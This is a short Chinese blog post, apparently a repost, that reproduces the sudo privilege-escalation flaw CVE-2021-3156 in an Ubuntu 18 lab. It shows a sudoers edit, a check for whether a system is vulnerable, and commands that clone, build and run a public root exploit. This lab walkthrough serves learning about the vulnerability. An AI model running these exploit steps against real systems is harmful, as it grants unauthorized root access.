首页 > 其他 > 详细

CVE-2021-3156 sudo提权漏洞复现

时间:2021-04-11 21:19:16      阅读:20      评论:0      收藏:0      [点我收藏+]

CVE-2021-3156 sudo提权漏洞复现

sudo官方在一月份的时候已经将漏洞修复,因此后面更新安装的sudo已经补上这个漏洞

复现环境

Ubuntu18 + sudo 1.8.21

技术分享图片

低权限用户test

技术分享图片

vim /etc/sudoers

test ALL=(root) NOPASSWD:/usr/sbin/useradd,/usr/sbin/usermod

漏洞复现

技术分享图片

报错开头以sudoedit则存在漏洞,报错以usage开头,则不受影响

下载exp并执行

git clone https://github.com/blasty/CVE-2021-3156.git
make
./sudo-hax-me-a-sandwich 0

技术分享图片

CVE-2021-3156 sudo提权漏洞复现

原文:https://www.cnblogs.com/buchiyexiao/p/14644470.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!